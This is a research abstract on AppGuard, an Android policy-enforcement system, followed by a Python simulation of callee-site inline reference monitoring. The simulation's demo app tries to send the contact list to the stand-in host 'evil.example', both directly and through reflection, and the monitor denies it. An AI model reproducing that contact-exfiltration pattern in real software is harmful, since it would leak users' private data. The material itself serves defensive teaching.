AppGuard - Fine-Grained Policy Enforcement for Untrusted Android Applications

Android's success makes it a prominent target for malicious software, yet the user has very limited control over the security-relevant operations an installed app may perform. This work presents AppGuard, a powerful and flexible security system that overcomes this deficiency. It enforces user-defined security policies on untrusted Android applications without requiring any changes to the smartphone's firmware, root access, or the like. Fine-grained and stateful security policies are expressed in a formal specification language, which also supports secrecy requirements. Our system offers complete mediation of security-relevant methods through callee-site inline reference monitoring: the monitor is inlined at the entry of the guarded method rather than at each call site, so every caller, including indirect and reflective ones, is covered, and the approach supports widespread deployment. In the experimental analysis we demonstrate the removal of permissions from overly curious apps as well as defenses against several recent real-world attacks on Android phones. Our technique exhibits very little space and runtime overhead. The utility of AppGuard has already been demonstrated by more than 1,000,000 downloads.
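The following is an added illustration of the two ideas the abstract combines, a stateful policy and callee-site mediation; it is not AppGuard's code, its policy language, or its Dalvik instrumentation. AppGuard patches the entry of framework methods inside the app's own process; here a constructed stand-in "system library" is patched by swapping its attributes, and a hypothetical automaton-style policy (contacts must not leave via the network once read, a revoked permission yields an empty result instead of a crash, SMS is rate-limited) decides at the guarded method's entry. The stand-in functions, the policy rules, and the names `make_lib`, `Policy`, `CalleeSiteMonitor` and `demo` are all assumptions for this example.

```python
"""Callee-site inline reference monitoring, simulated in Python.

Hypothetical illustration only: the library, policy and names below are
constructed for this example and are not AppGuard's own code or policy language.
"""
import types
from dataclasses import dataclass, field


def make_lib():
    # Constructed stand-in for a sealed system library (not the Android API).
    # The real AppGuard patches method entries in the framework; here we
    # replace attributes on a namespace, so every caller, direct or via
    # getattr (reflection), reaches the same guard.
    return types.SimpleNamespace(
        read_contacts=lambda: ["Alice", "Bob"],
        send_http=lambda host, body: f"POST {len(body)} bytes to {host}",
        send_sms=lambda number, text: f"SMS to {number}",
    )


class PolicyViolation(Exception):
    """Raised when the policy denies a call and offers no substitute result."""


@dataclass
class Policy:
    """A stateful policy (security automaton) plus user-revoked permissions."""
    revoked: set = field(default_factory=set)   # permissions the user removed
    contacts_read: bool = False                 # automaton state: data was read
    sms_budget: int = 3                         # hypothetical rate limit
    log: list = field(default_factory=list)

    def decide(self, name, args, kwargs):
        """Return (allow, substitute); substitute is returned to the app on deny."""
        if name == "read_contacts":
            if "READ_CONTACTS" in self.revoked:
                return False, []      # app sees an empty list, not a crash
            self.contacts_read = True
            return True, None
        if name == "send_http":
            # Secrecy-style rule: once contacts were read, no network output.
            return (not self.contacts_read), None
        if name == "send_sms":
            if "SEND_SMS" in self.revoked or self.sms_budget <= 0:
                return False, None
            self.sms_budget -= 1
            return True, None
        return True, None


class CalleeSiteMonitor:
    """Installs one guard per protected method at the callee, not at call sites."""

    def __init__(self, target, policy):
        self.target, self.policy, self.original = target, policy, {}

    def install(self, *names):
        for name in names:
            self.original[name] = getattr(self.target, name)
            setattr(self.target, name, self._guard(name))

    def _guard(self, name):
        def guarded(*args, **kwargs):
            allow, substitute = self.policy.decide(name, args, kwargs)
            self.policy.log.append((name, "allow" if allow else "deny"))
            if allow:
                return self.original[name](*args, **kwargs)
            if substitute is not None:
                return substitute
            raise PolicyViolation(name)
        return guarded


def demo(revoked=()):
    """Run a curious app against the monitored library; return what it observed."""
    lib = make_lib()
    policy = Policy(revoked=set(revoked))
    CalleeSiteMonitor(lib, policy).install("read_contacts", "send_http", "send_sms")
    results = {"contacts": lib.read_contacts()}
    try:   # direct call site
        results["http"] = lib.send_http("evil.example", ",".join(results["contacts"]))
    except PolicyViolation:
        results["http"] = "denied"
    try:   # reflective call: a caller-site rewriter would not see this one
        results["http_reflective"] = getattr(lib, "send_http")("evil.example", "x")
    except PolicyViolation:
        results["http_reflective"] = "denied"
    sms = []
    for i in range(4):
        try:
            sms.append(lib.send_sms("+15550001", f"msg {i}"))
        except PolicyViolation:
            sms.append("denied")
    results["sms"], results["log"] = sms, policy.log
    return results


if __name__ == "__main__":
    for label, revoked in (("full permissions", ()), ("contacts revoked", {"READ_CONTACTS"})):
        print(label, demo(revoked))
```

Because the guard sits at the method's entry, the reflective `getattr(lib, "send_http")` is mediated exactly like the literal call; a rewriter that only patches syntactic call sites in the app would miss it. Returning an empty list for a revoked permission mirrors the abstract's "removal of permissions" without crashing the app.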
